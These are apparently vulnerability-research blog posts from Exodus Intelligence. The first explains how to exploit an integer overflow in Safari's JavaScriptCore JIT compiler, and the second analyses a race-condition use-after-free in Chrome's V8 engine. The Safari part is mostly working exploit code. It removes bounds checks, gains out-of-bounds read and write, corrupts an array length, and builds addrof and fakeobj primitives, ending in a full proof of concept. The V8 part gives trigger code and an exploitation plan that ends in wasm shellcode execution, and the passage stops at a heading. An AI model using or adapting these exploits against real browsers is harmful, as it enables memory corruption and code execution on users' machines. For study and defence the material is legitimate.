Thus, in this code, the range of the add variable at [1] is (0, array.length), which is in bounds of the array, so the bounds check is removed.

Abusing DFG to eliminate the Bounds Check

In summary, if we have the following code:

				
function jit(num){
    num = num | 0;
    let array = [1,2,3,4,5,6,7,8,9,10];
    if (num > 0){                          // [1]
        let add = num + 4;                  // [2]
        if (add < array.length){           // [3]
            return array[add];              // [4]
        }
    }
}
				
			

At [2], DFG knows that the variable add is greater than 0 due to it passing the check at [1]. Similarly, at [4] it knows that the add variable is less than array.length due to it passing the check at [3]. Putting both of these together, DFG can see that the add variable is greater than zero and less than array.length when the execution reaches [4], where the element with index add is retrieved from the array. Thus DFG can safely say that the range of add at [4] is [4, array.length]; it removes the bounds check as it assumes that the check will always pass. Now, what would happen if an integer overflow happens at [2], where add is calculated as num + 4? DFG relies on the fact that all these arithmetic operations are checked for an overflow, and if an overflow happens, the code will bail out of the JIT-compiled code. This is the assumption that we want to break.

Now that the bounds check has successfully been removed by DFG, triggering the bug will be a whole lot easier. Let’s dig in!

FTL will convert the DFG IR into the B3 representation and perform various optimizations. One of the early optimizations is strength reduction, which performs a variety of optimizations like constant folding, simple common sub-expression elimination, simplifying nodes to a lower form (e.g., CheckSub -> Sub), etc. The code in the following snippet shows a simple and unstable proof of concept for triggering the bug.

				
function jit(idx){
    // The array on which we will do the oob access
    let a = [1,2,3,4,5,6,7,8,9,0,12,3,4,5,6,7,8,9,23,234,423,234,234,234];

[1]
    // Inform the compiler that this is a number
    // with range [0, 0x7fff_ffff]
    let id = idx & 0x7fffffff;

[2]
    // Bug trigger - This will overflow if id is large enough.
    // FTL thinks range is [0, INT_MAX], Actual range is [INT_MIN, INT_MAX]
    let b = id << 2;

[3]
    // Tell DFG IR that b is less than array length.
    // According to DFG, b is in [INT_MIN, array.length)
    if (b < a.length){

[4]
        // On exploit run - convert the overflowed value
        // into a positive value.
        let c = b - 0x7fffffff;

[5]
        // force jit else dfg will update with osrExit
        if (c < 0) c = 1;

[6]
        // Tell DFG that 'c' > 0. It already knows c is less than array.length.
        if (c > 0){

[7]
            // DFG thinks that c is inbounds, range = [0, array.length).
            // Thus it removes bounds check and this is oob
            return a[ c ];
        }
        else{
            return [ c ,1234]
        }
    }
    else{
        return 0x1337
    }
}

function main(){

    // JIT compile the function with legitimate value
    // to train the compiler
    for (let k=0; k<1000000; k++){jit(k %10);}

    // Trigger the bug by passing the argument as 0x7fff_ffff
    print(jit(2147483647))
}
main()
				
			

The above PoC is just a modification of what was discussed at the start of this section. As before, there is no CheckInBounds node for the array load at [7].

Note that the DFG compiler thinks that the code at [4], b - 0x7fffffff, will never overflow because DFG assumes that this operation is checked, and thus an overflow would cause a bail out from the JIT code.

In B3, the range of b at [2] is incorrectly calculated as [0, 0x7fff_ffff] (due to the integer overflow bug we discussed earlier). This leads to the incorrect lowering of c at [4] from CheckSub to Sub as B3 now assumes that the sub-operation never overflows. This breaks the assumptions made by DFG to remove the bounds check because it is possible for b - 0x7fffffff to overflow and attain a large positive value. When running the exploit, the value of b becomes 0x7fff_ffff << 2 = 0xffff_fffc (it overflows and gets wrapped to 32 bits). This value is -4, and when 0x7fff_ffff is subtracted from it at [4], a signed overflow happens: -4 - 0x7fff_ffff = 0x7ffffffd. Thus the value of c (which is already verified by DFG to be less than the array length) becomes larger than array.length. This crashes JSC when it tries to use this huge value to do an out-of-bounds read.
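For reference, the two 32-bit wrap-arounds described above can be verified with a small standalone computation (a sketch that mimics the 32-bit wrapping of the JIT-ed code; it is not engine code):

// Sketch of the two 32-bit wrap-arounds in the exploit run (not engine code).
#include <cstdint>
#include <cstdio>

static int32_t wrap(int64_t v) {
    // Truncate to 32 bits, then reinterpret as a signed value.
    return static_cast<int32_t>(static_cast<uint32_t>(v));
}

int main() {
    int32_t idx = 0x7fffffff;
    int32_t id  = idx & 0x7fffffff;                            // [1] still 0x7fffffff
    int32_t b   = wrap(static_cast<int64_t>(id) << 2);         // [2] wraps to -4 (0xfffffffc)
    int32_t c   = wrap(static_cast<int64_t>(b) - 0x7fffffff);  // [4] wraps to 0x7ffffffd
    printf("b = %d (0x%08x)\n", b, static_cast<uint32_t>(b));
    printf("c = %d (0x%08x)\n", c, static_cast<uint32_t>(c));
}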

On a side note, [5] (if (c < 0) c = 1) forces the JIT compilation of [7] even if the bug is not triggered, as otherwise [7] would never be executed (it is unreachable with normal inputs) while the jit() function is being JIT-compiled.

Though this PoC crashes JSC, the out-of-bounds index is essentially an uncontrolled value, and it might not even crash, as it is possible that the page it is trying to read is mapped with read permissions. Thus, unless we want to spray gigabytes of memory to exploit the out-of-bounds read, we need to control this value for more stability and exploitability.

Controlling the Out-of-Bounds Read/Write

After some tests, we found that single decrements to the index do not break the assumptions made by the DFG optimizer. Hence, to better control the out-of-bounds index, it can be single-decremented a desired number of times before the length check. The final version of the jit() function, which provides full control over the out-of-bounds index and also functions in the Safari browser, is highlighted in the following PoC.

				
function jit(idx, times,val){
    let a = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let big = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let new_ary = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let tmp = 13.37;
    let id = idx & 0x7fffffff;

[1]
    let b = id << 2;

[2]
    if (b < a.length){

[3]
        let c = b - 0x7fffffff;

        // force jit else dfg will update with osrExit
        if (c < 0) c = 1;

[4]
        // Single decrement the value of c
        while(c > 1){
            if(times <= 0){
                break
            }else{
                c -= 1;
                times -= 1;
            }
        }

[5]
        if (c > 0){
[6]
            tmp = a[ c ];

[7]
            a[ c ] = val;
            return [big, tmp, new_ary];
        }
    }
}

function main(){

[8]
    for (let k=0; k<1000000; k++){jit(k %10,1,1.1);}
    let target_length = 7.82252528543333e-310;         // 0x900000008000

[9]
    print(jit(2147483647, 0x7ffffff0,target_length));
}
main()
				
			

The function jit() is JIT-compiled at [8]. There is no CheckInBounds for the array load at [6] for the reasons discussed above. The jit() call at [9] triggers the bug by passing a value of 0x7fffffff to the jitted function. When this is passed, the value of b at [1] becomes -4 (result of 0x7fffffff << 2 wrapped to 32 bits becomes 0xfffffffc). This is obviously less than a.length (b is negative, and it is a signed comparison) so it passes the check at [2]. The subtract operation at [3] does not check for overflow and results in c obtaining a large positive value (0x7ffffffd) due to an integer overflow. This can be further reduced to a controlled value by doing single decrements, which the while loop at [4] does. At the end of the loop, c contains a value of 0xd. Now this is greater than zero, so it passes the check at [5] and ends up in a controlled out-of-bounds read at [6] and an out-of-bounds write at [7]. This ends up corrupting the length field of the array that lies immediately after the array a (the big array) and sets its length and capacity to a huge value. This results in the big array being able to read/write out-of-bounds values over a large extent on the heap.

Note that in the above PoC, we are writing out of bounds to corrupt the length field of the big array. We are writing an 8-byte double value, so we write 0x9000_00008000 encoded as a double. The lower 4 bytes of this value (i.e. 0x8000) signify the length, and the upper 4 bytes (0x9000) are the capacity we are setting.
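As a quick sanity check of that encoding (a standalone sketch, not part of the exploit), the bit pattern can be assembled from the two 32-bit fields and reinterpreted as a double:

// Quick check of the double encoding used above (not part of the exploit).
#include <cstdint>
#include <cstdio>
#include <cstring>

int main() {
    uint32_t length   = 0x8000;            // new length (low 4 bytes)
    uint32_t capacity = 0x9000;            // new capacity (high 4 bytes)
    uint64_t bits = (static_cast<uint64_t>(capacity) << 32) | length; // 0x900000008000

    double d;
    std::memcpy(&d, &bits, sizeof d);      // reinterpret the raw bits as a double
    printf("%.15g\n", d);                  // prints ~7.82252528543333e-310
}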

In order to control the OOB read, an attacker can just change the value of the times argument for the jit() function at [9]. Let us now leverage this to gain the addrof and fakeobj primitives!

The addrof and fakeobj Primitives

The addrof primitive allows us to get an object’s address, while the fakeobj primitive gives us the ability to load a crafted fake object. Refer to the Phrack article by Samuel Groß for more details.

The addrof primitive can be achieved by reading an object pointer out of bounds from an ArrayWithDouble array. The fakeobj primitive can be achieved by writing the address as a double into an ArrayWithContiguous array using an out-of-bounds write. The following code leverages the bug we found to attain this.

The out-of-bounds write is used to corrupt the length and capacity of the big array which is adjacent to the array a. This provides an ability to do a clean out-of-bounds read/write into the new_ary array from the big array. After the length and capacity of the big array are corrupted, both the big and new_ary arrays are returned to the calling function.

Let the arrays returned from the jit() function be called oob_rw_ary and confusion_ary. Initially, both of them are of the ArrayWithDouble type. However, for the confusion_ary array, we force a structure transition to the ArrayWithContiguous type.

				
function pwn(){
    log("started!")

    // optimize the buggy function
    for (let k=0; k<1000000; k++){jit_bug(k %10,1,1.1);}

    let oob_rw_ary = undefined;
    let target_length = 7.82252528543333e-310; // 0x900000008000
    let target_real_len = 0x8000
    let confusion_ary = undefined;

    // Trigger the oob write to edit the length of an array
    let res = jit_bug(2147483647, 0x7ffffff0,target_length)
    oob_rw_ary = res[0];
    confusion_ary = res[2];

    // Convert the float array to a jsValue array
    confusion_ary[1] = {};
    log(hex(f2i(res[1])) + " length -> "+oob_rw_ary.length);

    if(oob_rw_ary.length != target_real_len){
        log("[-] exploit failed -> bad array length; maybe not vulnerable?")
        return 1;
    }

    // index of confusion_ary[1]
    let confusion_idx = 15;
}
				
			

At this point, the necessary setup for the addrof and fakeobj primitives is done. Since the oob_rw_ary array can go out of bounds to the confusion_ary array, it is possible to write object pointers as doubles into it.

The addrof primitive is achieved by writing an object to the confusion_ary array and then reading it out-of-bounds as a double from the oob_rw_ary array.

Similarly, the fakeobj primitive is implemented by writing an object pointer out-of-bounds as a double to the oob_rw_ary array and then reading it as an object from confusion_ary.

				
					
    function addrof(obj){
        let addr = undefined;
        confusion_ary[1] = obj;
        addr = f2i(oob_rw_ary[confusion_idx]);
        log("[addrof] -> "+hex(addr));
        return addr;
    }

    function fakeobj(addr){
        let obj = undefined;
        log("[fakeobj] getting obj from -> "+hex(addr));
        oob_rw_ary[confusion_idx] = i2f(addr)
        obj = confusion_ary[1];
        confusion_ary[1] = 0.0; // clear the cell
        log("[fakeobj] fakeobj ok");
        return obj
    }
				
			

And there we go! We have successfully converted the bug into stable addrof and fakeobj primitives!

All together

Let us put all this together to see the full PoC that achieves the addrof and fakeobj from the initial bug:

				
var convert = new ArrayBuffer(0x10);
var u32 = new Uint32Array(convert);
var u8 = new Uint8Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
let switch_var = 0;
function i2f(i) {
    u32[0] = i%BASE;
    u32[1] = i/BASE;
    return f64[0];
}

function f2i(f) {
    f64[0] = f;
    return u32[0] + BASE*u32[1];
}

function unbox_double(d) {
    f64[0] = d;
    u8[6] -= 1;
    return f64[0];
}

function hex(x) {
    if (x < 0)
        return `-${hex(-x)}`;
    return `0x${x.toString(16)}`;
}

function log(data){
    print("[~] DEBUG [~] " + data)
}


function pwn(){
    log("started!")

    /* The function that will trigger the overflow to corrupt the length of the following array */

    function jit_bug(idx, times,val){
        let a = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let big = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let new_ary = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let tmp = 13.37;
        let id = idx & 0x7fffffff;
        let b = id << 2;
        if (b < a.length){
            let c = b - 0x7fffffff;
            if (c < 0) c = 1; // force jit else dfg will update with osrExit
            while(c > 1){
                if(times == 0){
                    break
                }else{
                    c -= 1;
                    times -= 1;
                }
            }
            if (c > 0){
                tmp = a[ c ];
                a[ c ] = val;
                return [big, tmp, new_ary]
            }
        }
    }

    for (let k=0; k<1000000; k++){jit_bug(k %10,1,1.1);} // optimize the buggy function

    let oob_rw_ary = undefined;
    let target_length = 7.82252528543333e-310; // 0x900000008000
    let target_real_len = 0x8000
    let confusion_ary = undefined;

    // Trigger the oob write to edit the length of an array
    let res = jit_bug(2147483647, 0x7ffffff0,target_length)
    oob_rw_ary = res[0];
    confusion_ary = res[2];
    confusion_ary[1] = {}; // Convert the float array to a jsValue array
    log(hex(f2i(res[1])) + " length -> "+oob_rw_ary.length);

    if(oob_rw_ary.length != target_real_len){
        log("[-] exploit failed -> bad array length; maybe not vulnerable?")
        return 1;
    }

    let confusion_idx = 15; // index of confusion_ary[1]

    function addrof(obj){
        let addr = undefined;
        confusion_ary[1] = obj;
        addr = f2i(oob_rw_ary[confusion_idx]);
        log("[addrof] -> "+hex(addr));
        return addr;
    }

    function fakeobj(addr){
        let obj = undefined;
        log("[fakeobj] getting obj from -> "+hex(addr));
        oob_rw_ary[confusion_idx] = i2f(addr)
        obj = confusion_ary[1];
        confusion_ary[1] = 0.0; // clear the cell
        log("[fakeobj] fakeobj ok");
        return obj
    }

    /// Verify that addrof works
    let obj = {p1: 0x1337};
    // print the actual address of the object
    log(describe(obj));
    // Leak the address of the object
    log(hex(addrof(obj)));

    /// Verify that the fakeobj works. This will crash the engine
    log(describe(fakeobj(0x41414141)));
}
pwn();
				
			

This will leak the address of the obj object with addrof() and try to create a fake object at the address 0x41414141, which will end up crashing the engine. This should work on any version of a vulnerable JSC build.

Conclusion

We discussed a vulnerability we found in 2020 in the FTL JIT compiler, where an incorrect range computation led to an integer overflow. We saw how we could convert this integer overflow into a stable out-of-bounds read/write on the JavaScriptCore heap and use that to create the addrof and fakeobj primitives. These primitives allow a renderer code execution exploit on Intel Macs.

This bug was patched in the May 2021 update to Safari. The patch for this vulnerability is simple: if an overflow occurs, the upper and lower bounds are set to the maximum and minimum values of that type, respectively.

The vulnerability patch
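As a rough approximation of the fix described above (our own sketch based on that description, written as a standalone function; it is not the actual WebKit change), the range computation for a left shift would widen both bounds to the full type range as soon as either shifted bound fails the round-trip check:

// Sketch of the described fix (not the actual WebKit patch), shown as a
// standalone function over an int32 range: if either shifted bound fails
// the round-trip check, widen BOTH bounds to the full type range.
#include <cstdint>
#include <limits>
#include <utility>

std::pair<int32_t, int32_t> shlRange(int32_t min, int32_t max, int32_t shiftAmount)
{
    auto shl = [](int32_t v, int32_t s) {
        return static_cast<int32_t>(static_cast<uint32_t>(v) << s);
    };
    int32_t newMin = shl(min, shiftAmount);
    int32_t newMax = shl(max, shiftAmount);

    if ((newMin >> shiftAmount) != min || (newMax >> shiftAmount) != max) {
        // Overflow detected somewhere: give up on both bounds at once.
        newMin = std::numeric_limits<int32_t>::min();
        newMax = std::numeric_limits<int32_t>::max();
    }
    return { newMin, newMax };
}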

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

About Exodus Intelligence

Our world-class team of vulnerability researchers discovers hundreds of exclusive zero-day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-day research, where we select critical N-day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Shifting boundaries: Exploiting an Integer Overflow in Apple Safari appeared first on Exodus Intelligence.

Google Chrome V8 ArrayShift Race Condition Remote Code Execution

16 May 2023 at 22:36

By Javier Jimenez

Overview

This post describes a method of exploiting a race condition in the V8 JavaScript engine, version 9.1.269.33. The vulnerability affects the following versions of Chrome and Edge:

  • Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.
  • Microsoft Edge versions between 90.0.818.39 and 91.0.864.41.

The vulnerability occurs when one of the TurboFan jobs generates a handle to an object that is being modified at the same time by the ArrayShift built-in, resulting in a use-after-free (UaF) vulnerability. Unlike traditional UaFs, this vulnerability occurs within garbage-collected memory (UaF-gc). The bug lies within the ArrayShift built-in, as it lacks the necessary checks to prevent modifications on objects while other TurboFan jobs are running.

This post assumes the reader is familiar with all the elementary concepts needed to understand V8 internals and general exploitation. The references section contains links to blogs and documentation that describe prerequisite concepts such as TurboFan, Generational Garbage Collection, and V8 JavaScript Objects’ in-memory representation.


The Vulnerability

When the ArrayShift built-in is called on an array object via Array.prototype.shift(), the length and starting address of the array may be changed while a compilation and optimization (TurboFan) job in the Inlining phase executes concurrently. When TurboFan reduces an element access of this array in the form of array[0], the function ReduceElementLoadFromHeapConstant() is executed on a different thread. This element access points to the address of the array being shifted via the ArrayShift built-in. If the ReduceElementLoadFromHeapConstant() function runs just before the shift operation is performed, it results in a dangling pointer. This is because Array.prototype.shift() “frees” the object to which the compilation job still “holds” a reference. Both “free” and “hold” are not 100% accurate terms in this garbage collection context, but they serve the purpose of explaining the vulnerability conceptually. Later we describe these actions more accurately as “creating a filler object” and “creating a handle”, respectively.

ReduceElementLoadFromHeapConstant() is a function that is called when TurboFan tries to optimize code that loads a value from the heap, such as array[0]. Below is an example of such code:

				
function main() {
  let arr = new Array(500).fill(1.1);

  function load_elem() {
    let value = arr[0];
    for (let v19 = 0; v19 < 1500; v19++) {}
  }

  for (let i = 0; i < 500; i++) {
    load_elem();
  }
}
main();

				
			

By running the code above in the d8 shell with the command ./d8 --trace-turbo-reduction, we observe that the JSNativeContextSpecialization optimization, to which the ReduceElementLoadFromHeapConstant() function belongs, kicks in on node #27 by taking node #57 as its first input. Node #57 is the node for the array arr:

				
					$ ./d8 --trace-opt --trace-turbo-reduction /tmp/loadaddone.js
[TRUNCATED]
- Replacement of #13: JSLoadContext[0, 2, 1](3, 7) with #57: HeapConstant[0x234a0814848d <JSArray[500]>] by reducer JSContextSpecialization
- Replacement of #27: JSLoadProperty[sloppy, FeedbackSource(#0)](57, 23, 4, 3, 28, 24, 22) with #64: CheckFloat64Hole[allow-return-hole, FeedbackSource(INVALID)](63, 63, 22) by reducer JSNativeContextSpecialization
[TRUNCATED]

				
			

Therefore, executing the Array.prototype.shift() method on the same array, arr, during the execution of the aforementioned TurboFan job may trigger the vulnerability. Since this is a race condition, the vulnerability may not trigger reliably. The reliability depends on the resources available for the V8 engine to use.

The following is a minimal JavaScript test case that triggers a debug check on a debug build of d8:

				
					function main() {
  let arr = new Array(500).fill(1.1);

  function bug() {

// [1]

    let a = arr[0];

// [2]
    
    arr.shift();
    for (let v19 = 0; v19 < 1500; v19++) {}
  }

// [3]

  for (let i = 0; i < 500; i++) {
    bug();
  }
}

main();
				
			

The loop at [3] triggers the compilation of the bug() function since it’s a “hot” function. This starts a concurrent compilation job for the function where [1] will force a call to ReduceElementLoadFromHeapConstant(), to reduce the load at index 0 for a constant value. While TurboFan is running on a different thread, the main thread executes the shift operation on the same array [2], modifying it. However, this minimized test case does not trigger anything further than an assertion (via DCHECK) on debug builds. Although the test case executes without fault on a release build, it is sufficient to understand the rest of the analysis.

The following numbered steps show the order of execution of code that results in the use-after-free. The end result, at step 8, is the TurboFan thread pointing to a freed object:

Steps in use-after-free
Triggering the race condition

In order to achieve a dangling pointer, let’s figure out how each thread holds a reference in V8’s code.

Reference from the TurboFan Thread

Once the TurboFan job is fired, the following code will get executed:

				
					// src/compiler/js-native-context-specialization.cc 

Reduction JSNativeContextSpecialization::ReduceElementLoadFromHeapConstant(
    Node* node, Node* key, AccessMode access_mode,
    KeyedAccessLoadMode load_mode) {

[TRUNCATED]

  HeapObjectMatcher mreceiver(receiver);
  HeapObjectRef receiver_ref = mreceiver.Ref(broker());

[TRUNCATED]

[1]

  NumberMatcher mkey(key);
  if (mkey.IsInteger() &&
      mkey.IsInRange(0.0, static_cast<double>(JSObject::kMaxElementIndex))) {
    STATIC_ASSERT(JSObject::kMaxElementIndex <= kMaxUInt32);
    const uint32_t index = static_cast<uint32_t>(mkey.ResolvedValue());
    base::Optional<ObjectRef> element;

    if (receiver_ref.IsJSObject()) {

[2]

      element = receiver_ref.AsJSObject().GetOwnConstantElement(index);

[TRUNCATED]  
				
			

Since this reduction is done via ReducePropertyAccess() there is an initial check at [1] to know whether the access to be reduced is actually in the form of an array index access and whether the receiver is a JavaScript object. After that is verified, the GetOwnConstantElement() method is called on the receiver object at [2] to retrieve a constant element from the calculated index.

				
					// src/compiler/js-heap-broker.cc

base::Optional<ObjectRef> JSObjectRef::GetOwnConstantElement(
    uint32_t index, SerializationPolicy policy) const {

[3]

  if (data_->should_access_heap() || FLAG_turbo_direct_heap_access) {

[TRUNCATED]

[4]

    base::Optional<FixedArrayBaseRef> maybe_elements_ref = elements();

[TRUNCATED]

				
			

The code at [3] verifies whether the current caller should access the heap. The verification passes since the reduction is for loading an element from the heap. The flag FLAG_turbo_direct_heap_access is enabled by default. Then, at [4] the elements() method is called with the intention of obtaining a reference to the elements of the receiver object (the array). The  elements() method is shown below:

				
					// src/compiler/js-heap-broker.cc
base::Optional<FixedArrayBaseRef> JSObjectRef::elements() const {
  if (data_->should_access_heap()) {

[5]

    return FixedArrayBaseRef(
        broker(), broker()->CanonicalPersistentHandle(object()->elements()));
  }

[TRUNCATED]

// File: src/objects/js-objects-inl.h
DEF_GETTER(JSObject, elements, FixedArrayBase) {
  return TaggedField<FixedArrayBase, kElementsOffset>::load(cage_base, *this);
}
				
			

Further down the call stack, elements() will call CanonicalPersistentHandle() with a reference to the elements of the receiver object, denoted by object()->elements() at [5]. This elements() method call is different than the previous. This one directly accesses the heap and returns the pointer within the V8 heap. It accesses the same pointer object in memory as the ArrayShift built-in.

Finally, CanonicalPersistentHandle() will create a Handle reference. Handles in V8 are objects that are exposed to the JavaScript environment. The most notable property is that they are tracked by the garbage collector.

				
					// File: src/compiler/js-heap-broker.h

  template <typename T>
  Handle<T> CanonicalPersistentHandle(T object) {
    if (canonical_handles_) {

[TRUNCATED]

    } else {

[6]

      return Handle<T>(object, isolate());
    }
  }
				
			

The Handle created at [6] is now exposed to the JavaScript environment and a reference is held while the compilation job is being executed. At this point, if any other parts of the process modify the reference, for example, forcing a free on it, the TurboFan job will hold a dangling pointer. Exploiting the vulnerability relies on this behavior. In particular, knowing the precise point when the TurboFan job runs allows us to keep the bogus pointer within our reach.

Reference from the Main Thread (ArrayShift Built-in)

Once the code depicted in the previous section is running and it passes the point where the Handle to the array was created, executing the ArrayShift JavaScript function on the same array triggers the vulnerability. The following code is executed:

				
					// File: src/builtins/builtins-array.cc

BUILTIN(ArrayShift) {
  HandleScope scope(isolate);

  // 1. Let O be ? ToObject(this value).
  Handle<Object> receiver;

[1]

  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, receiver, Object::ToObject(isolate, args.receiver()));

[TRUNCATED]

  if (CanUseFastArrayShift(isolate, receiver)) {

[2]

    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
    return *array->GetElementsAccessor()->Shift(array);
  }

[TRUNCATED]

}
				
			

At [1], the receiver object (arr in the original JavaScript test case) is assigned to the receiver variable via the ASSIGN_RETURN_FAILURE_ON_EXCEPTION macro. It then uses this receiver variable [2] to create a new Handle of the JSArray type in order to call the Shift() function on it.

Conceptually, the shift operation on an array performs the following modifications to the array in the V8 heap:

ArrayShift operation on an Array of length 8

Two things change in memory: the pointer that denotes the start of the array is incremented, and the first element is overwritten by a filler object (which we referred to as “freed”). The filler is a special type of object described further below. With this picture in mind, we can continue the analysis with a clear view of what is happening in the code.

Prior to any manipulations of the array object, the following function calls are executed, passing the array (now of Handle<JSArray> type) as an argument:

				
					// File: src/objects/elements.cc

  Handle<Object> Shift(Handle<JSArray> receiver) final {

[3]

    return Subclass::ShiftImpl(receiver);
  }

[TRUNCATED]

  static Handle<Object> ShiftImpl(Handle<JSArray> receiver) {

[4]

    return Subclass::RemoveElement(receiver, AT_START);
  }

[TRUNCATED]

static Handle<Object> RemoveElement(Handle<JSArray> receiver,
                                      Where remove_position) {

[TRUNCATED]

[5]

    Handle<FixedArrayBase> backing_store(receiver->elements(), isolate);

[TRUNCATED]

    if (remove_position == AT_START) {

[6]

      Subclass::MoveElements(isolate, receiver, backing_store, 0, 1, new_length,
                             0, 0);
    }

[TRUNCATED]

}
				
			

Shift() at [3] simply calls ShiftImpl(). Then, ShiftImpl() at [4] calls RemoveElement(), passing AT_START as the second argument. This indicates that the shift operation removes the first element (index position 0) of the array.

Within the RemoveElement() function, the elements() function from the src/objects/js-objects-inl.h file is called again on the same receiver object and a Handle is created and stored in the backing_store variable. At [5] we see how the reference to the same object as the previous TurboFan job is created.

Finally, a call to MoveElements() is made [6] in order to perform the shift operation.

				
					// File: src/objects/elements.cc

  static void MoveElements(Isolate* isolate, Handle<JSArray> receiver,
                           Handle<FixedArrayBase> backing_store, int dst_index,
                           int src_index, int len, int hole_start,
                           int hole_end) {
    DisallowGarbageCollection no_gc;

[7]

    BackingStore dst_elms = BackingStore::cast(*backing_store);
    if (len > JSArray::kMaxCopyElements && dst_index == 0 &&

[8]

        isolate->heap()->CanMoveObjectStart(dst_elms)) {
      dst_elms = BackingStore::cast(

[9]

          isolate->heap()->LeftTrimFixedArray(dst_elms, src_index));

[TRUNCATED]
				
			

In MoveElements(), the variables dst_index and src_index hold the values 0 and 1 respectively, since the shift operation will shift all the elements of the array from index 1, and place them starting at index 0, effectively removing position 0 of the array. It starts by casting the backing_store variable to a BackingStore object and storing it in the dst_elms variable [7]. This is done to execute the CanMoveObjectStart() function, which checks whether the array can be moved in memory [8]. 

This check function is where the vulnerability resides: it does not check whether other compilation jobs are running. Because the check passes, dst_elms, the reference to the elements of the target array, is passed on to LeftTrimFixedArray(), which performs modifying operations on it.

				
					// File: src/heap/heap.cc

[10]

bool Heap::CanMoveObjectStart(HeapObject object) {
  if (!FLAG_move_object_start) return false;

  // Sampling heap profiler may have a reference to the object.
  if (isolate()->heap_profiler()->is_sampling_allocations()) return false;

  if (IsLargeObject(object)) return false;

  // We can move the object start if the page was already swept.
  return Page::FromHeapObject(object)->SweepingDone();
}
				
			

In a vulnerable V8 version, we can see that while the CanMoveObjectStart() function at [10] checks for things such as the profiler holding references to the object or the object being a large object, it does not contain any checks for concurrent compilation jobs. Therefore all checks pass and the function returns true, leading to the LeftTrimFixedArray() function call with dst_elms as the first argument.

				
					// File: src/heap/heap.cc

FixedArrayBase Heap::LeftTrimFixedArray(FixedArrayBase object,
                                        int elements_to_trim) {

[TRUNCATED]

  const int element_size = object.IsFixedArray() ? kTaggedSize : kDoubleSize;
  const int bytes_to_trim = elements_to_trim * element_size;

[TRUNCATED]

[11]

  // Calculate location of new array start.
  Address old_start = object.address();
  Address new_start = old_start + bytes_to_trim;

[TRUNCATED]

[12]

  CreateFillerObjectAt(old_start, bytes_to_trim,
                       MayContainRecordedSlots(object)
                           ? ClearRecordedSlots::kYes
                           : ClearRecordedSlots::kNo);

[TRUNCATED]

#ifdef ENABLE_SLOW_DCHECKS
  if (FLAG_enable_slow_asserts) {
    // Make sure the stack or other roots (e.g., Handles) don't contain pointers
    // to the original FixedArray (which is now the filler object).
    SafepointScope scope(this);
    LeftTrimmerVerifierRootVisitor root_visitor(object);
    ReadOnlyRoots(this).Iterate(&root_visitor);

[13]

    IterateRoots(&root_visitor, {});
  }
#endif  // ENABLE_SLOW_DCHECKS

[TRUNCATED]
}
				
			

At [11] the address of the object, given as the first argument to the function, is stored in the old_start variable. The address is then used to create a Filler object [12]. Fillers, in garbage collection, are a special type of object that denotes a free space without actually freeing it, with the intention of ensuring that there is a contiguous space of objects for a garbage collection cycle to iterate over. Regardless, a Filler object denotes a free space that can later be reclaimed by other objects. Therefore, since the compilation job also has a reference to this object’s address, the optimization job now points to a Filler object which, after a garbage collection cycle, will be a dangling pointer.

For completeness, the marker at [13] shows the place where debug builds would bail out. The IterateRoots() function takes a variable created from the initial object (dst_elms) as an argument, which is now a Filler, and checks whether any other part of V8 is holding a reference to it. If a running compilation job holds such a reference, this function crashes the process on debug builds.

Exploitation

Exploiting this vulnerability involves the following steps:

  • Triggering the vulnerability by creating an Array barr and forcing a compilation job at the same time as the ArrayShift built-in is called.
  • Triggering a garbage collection cycle in order to reclaim the freed memory with Array-like objects, so that it is possible to corrupt their length.
  • Locating the corrupted array and a marker object to construct the addrof, read, and write primitives.
  • Creating and instantiating a wasm instance with an exported main function, then overwriting the exported function’s code with shellcode.
  • Finally, calling the exported main function, which runs the previously written shellcode.

After reclaiming memory, there’s the need to find certain markers in memory, as the objects that reclaim memory might land at different offsets every time. Due to this, should the exploit fail to reproduce, it needs to be restarted to either win the race or correctly find the objects in the reclaimed space. The possible causes of failure are losing the race condition or the spray not being successful at placing objects where they’re needed.

Triggering the Vulnerability

Again, let’s start with a test case that triggers an assert in debug builds. The following JavaScript code triggers the vulnerability, crashing the engine on debug builds via a DCHECK_NE statement:

				
					 function trigger() {

[1]

    let buggy_array_size = 120;
    let PUSH_OBJ = [324];
    let barr = [1.1];
    for (let i = 0; i < buggy_array_size; i++) barr.push(PUSH_OBJ);

    function dangling_reference() {

[2]

      barr.shift();
      for (let i = 0; i < 10000; i++) { console.i += 1; }
      let a = barr[0];

[3]

      function gcing() {
        const v15 = new Uint8ClampedArray(buggy_array_size*0x400000);
      }
      let gcit = gcing();
      for (let v19 = 0; v19 < 500; v19++) {}
    }

[4]

    for (let i = 0; i < 4; i++) {
      dangling_reference();
    }
 }

trigger();
				
			

Triggering the vulnerability comprises the following steps:

  • At [1] an array barr is created by pushing objects PUSH_OBJ into it. These serve as a marker at later stages.
  • At [2] the bug is triggered by performing the shift on the barr array. A for loop triggers the compilation early, and a value from the array is loaded to trigger the right optimization reduction.
  • At [3] the gcing() function is responsible for triggering a garbage collection after each iteration. When the vulnerability is triggered, the reference to barr is freed. A dangling pointer is then held at this point.
  • At [4] there is the need to stop executing the function to be optimized exactly on the iteration that it gets optimized. The concurrent reference to the Filler object is obtained only at this iteration.

Reclaiming Memory and Corrupting an Array Length

The next excerpt of the code explains how the freed memory is reclaimed by the desired arrays in the full exploit. The goal of the following code is to get the elements of barr to point to the tmpfarr and tmpMarkerArray objects in memory, so that the length can be corrupted to finally build the exploit primitives.

Leveraging the barr array

